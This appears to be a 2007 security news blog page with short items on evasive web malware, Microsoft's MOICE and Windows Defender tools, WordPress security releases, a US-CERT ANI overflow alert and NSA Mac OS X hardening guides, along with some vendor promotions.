Information Security Philippines

Hackers are developing increasingly stealthy techniques to evade detection.  The attacks place malicious code on web sites, then keep track of the IP addresses that have visited infected sites; if the same IP address attempts to view the malicious site again, benign content is offered in its stead.

The attacks are also capable of identifying “the IP addresses of web crawlers used by URL filtering, reputation services and search engines,” and serve legitimate content to avoid being identified as malicious.

Recent findings reveal that hackers have created a new class of highly evasive attacks which represent a quantum leap in terms of technological sophistication, going far beyond drive-by downloads and code obfuscation.

The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected.

A follow-up study conducted by Finjan’s Malicious Code Research Centre warns of the growing presence of malicious code in online advertising.

More info at: VNUNet

It’s been estimated that three-fourths of today’s successful system hacks are perpetrated not via network security flaws, but by entering directly through the “front door” - exploiting vulnerabilities in customer facing web applications.

Grab a copy of SPI Dyanmic’s FREE SQL Injection white paper “SQL Injection: Are Your Web Applications Vulnerable?” Understand and prevent SQL Injection attacks today!

Viruses and threats are changing.

They are now more dangerous than ever. They are more discreet. They are faster. They are frequently designed to steal confidential information or money. They can even be ‘tailor-made’ to target each victim.

Malware Radar is a revolutionary breakthrough scanning technology developed by Panda Software.  Malware Radar has found banks, Fortune 500 companies, small businesses, and even government agencies infected with hidden malicious programs actively stealing information despite being “protected” by what they thought were the best antivirus and Internet security measures available.

Fast, comprehensive, and easy to use:

•     Works online - nothing to install
•     Finds and completely removes hidden malware
•     Works with all antivirus and security programs (does NOT replace them)
•     Leaves no trace on system after scan
•     Produces full comprehensive reports on system vulnerabilities and malware found

Take Malware Radar for a spin to get an automated malware audit.

Microsoft has released a free tool called Microsoft Office Isolated Conversion Environment, or MOICE, to help protect users from malware placed in Office files, a vector of attack that has recently gained popularity. 

MOICE converts Word, Excel and PowerPoint docs to their OpenXML counterparts and opens them in a quarantined environment to protect users’ computers from embedded malicious payloads designed to exploit holes in Microsoft Office. 

MOICE works in tandem with the File Block, a tool that allows administrators to establish group policies regarding users’ permissions to open certain file types.  Both tools work out of the box with Microsoft ffice 2007. 

Microsoft Office 2003 users need to install the Compatibility Pack for Word, Excel and PowerPoint 2007 Office File Formats first. 

There currently is no protection offered for users running versions prior to Microsof Office 2003.

http://support.microsoft.com/kb/935865

This version includes a number of new features, most notably Widgets integration, and over two hundred bug fixes. It’s named in honor of tenor saxophonist Stan Getz.

Goodies:

• WordPress Widgets allow you to easily rearrange and customize areas of your weblog (usually sidebars) with drag-and-drop simplicity. This functionality was originally available as a plugin Widgets are now included by default in the core code, significantly cleaned up, and enabled for the default themes.
• Full Atom support, including updating our Atom feeds to use the 1.0 standard spec and including an implementation of the Atom Publishing API to complement our XML-RPC interface.
• A new Blogger importer that is able to handle the latest version of Google’s Blogger product and seamlessly import posts and comments without any user interaction beyond entering your login.
• Infinite comment stream, meaning that on your Edit Comments page when you delete or spam a comment using the AJAX links under each comment it will bring in another comment in the background so you always have 20 items on the page. (I know it sounds geeky, but try it!)
• We now protect you from activating a plugin or editing a file that will break your blog.
• Core plugin and filter speed optimizations should make everything feel a bit more snappy and lighter on your server.
• We’ve added a hook for WYSIWYG support in a future version of Safari.

In addition there were also dozens of UI and accessibility improvements, ranging from more concise wording around options and links to things like a view and preview link above the content box when you’re editing a post or page, as well as several important security fixes. 

Wordpress will no longer continue to support the 2.1 branch, so this is a required upgrade.

Download Wordpress v2.2 Codename Getz.

This just in from Wordpress awhile ago…

We have a security update release now available for both the 2.1 and 2.0 branches of WordPress now available for immediate download. This update is highly recommend for all users of both branches.

These releases include fixes for several publicly known minor XSS issues, one major XML-RPC issue, and a proactive full sweep of the WordPress codebase to protect against future problems.

It isn’t April 1 anymore so this probably is the real thing. Make sure you guys update to this new version since it provides some important security fixes which if left unpatched will surely be easy to exploit.

Don’t forget to backup and test your backups first Good luck!

The Microsoft Threat Analysis & Modeling tool allows non-security subject matter experts to enter already known information including business requirements and application architecture which is then used to produce a feature-rich threat model. Along with automatically identifying threats, the tool can produce valuable security artifacts such as:

- Data access control matrix
- Component access control matrix
- Subject-object matrix
- Data Flow
- Call Flow
- Trust Flow
- Attack Surface
- Focused reports

Download from Microsoft

National Cyber Alert System
Technical Cyber Security Alert TA07-089A
Microsoft Windows ANI header stack buffer overflow

Original release date: March 30, 2007
Last revised: –
Source: US-CERT

Systems Affected

Microsoft Windows 2000, XP, Server 2003, and Vista are affected. Applications that provide attack vectors include:

* Microsoft Internet Explorer
* Microsoft Outlook
* Microsoft Outlook Express
* Microsoft Windows Mail
* Microsoft Windows Explorer Read the rest of this entry »

The National Security Agency (NSA) has published version 2 of its security guidelines for Mac OS X. The security documents are available in PDF format on their OS Guides page  for Mac OS X.

These documents for Mac OS X and Mac OS X Server represent best practices for securing the OS and are widely used by the industry as internal standards for configuring Mac OS X. The document is actually written by experts at Apple and endorsed by the NSA which says on its Website,” It is our belief that these guides establish the latest best practices for securing the products and recommend that traditional customers of our security recommendations use the Apple guides when securing Macintosh OS X 10.4.x and Macintosh OS X Server 10.4.x.”

Practices such as setting up admin accounts, generating passwords, the proper way to remove Classic, which can be a serious security problem for Mac OS X, managing the root account, and the use of Access Control Lists (ACLs) is covered.

Out of the box, Mac OS X is fairly secure, especially with respect to closed ports. However, for those in the enterprise who want to take advantage of every feature of Mac OS X to lock down and secure the OS against not only network but local intrusions, this is a must read.

http://www.nsa.gov/snac/downloads_macOSX10_4Server.cfm?MenuID=scg10.3.1.1

Microsoft on Thursday released an upgrade to its Windows Defender application, raising the version number from 1.1 to 7.0. The reason behind the version change is not clear, although the release does bring a redesigned user interface and new malware detection engine.

Windows Defender supports 64-bit operating systems, but no longer runs on Windows 2000, because Microsoft says the aging operating system has left mainstream support. WGA checking will also be enforced, meaning that Windows Defender will only remove “Severe” threats from computers that do not pass validation.

System Requirements:
- Supported Operating Systems: Windows Server 2003 Service Pack 1; Windows XP Service Pack 2
- Windows Defender no longer supports Windows 2000 as it went out of mainstream support in June 2005.